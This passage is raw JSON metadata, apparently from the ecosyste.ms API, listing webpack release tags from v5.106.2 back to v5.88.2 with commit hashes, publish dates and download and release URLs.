dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/a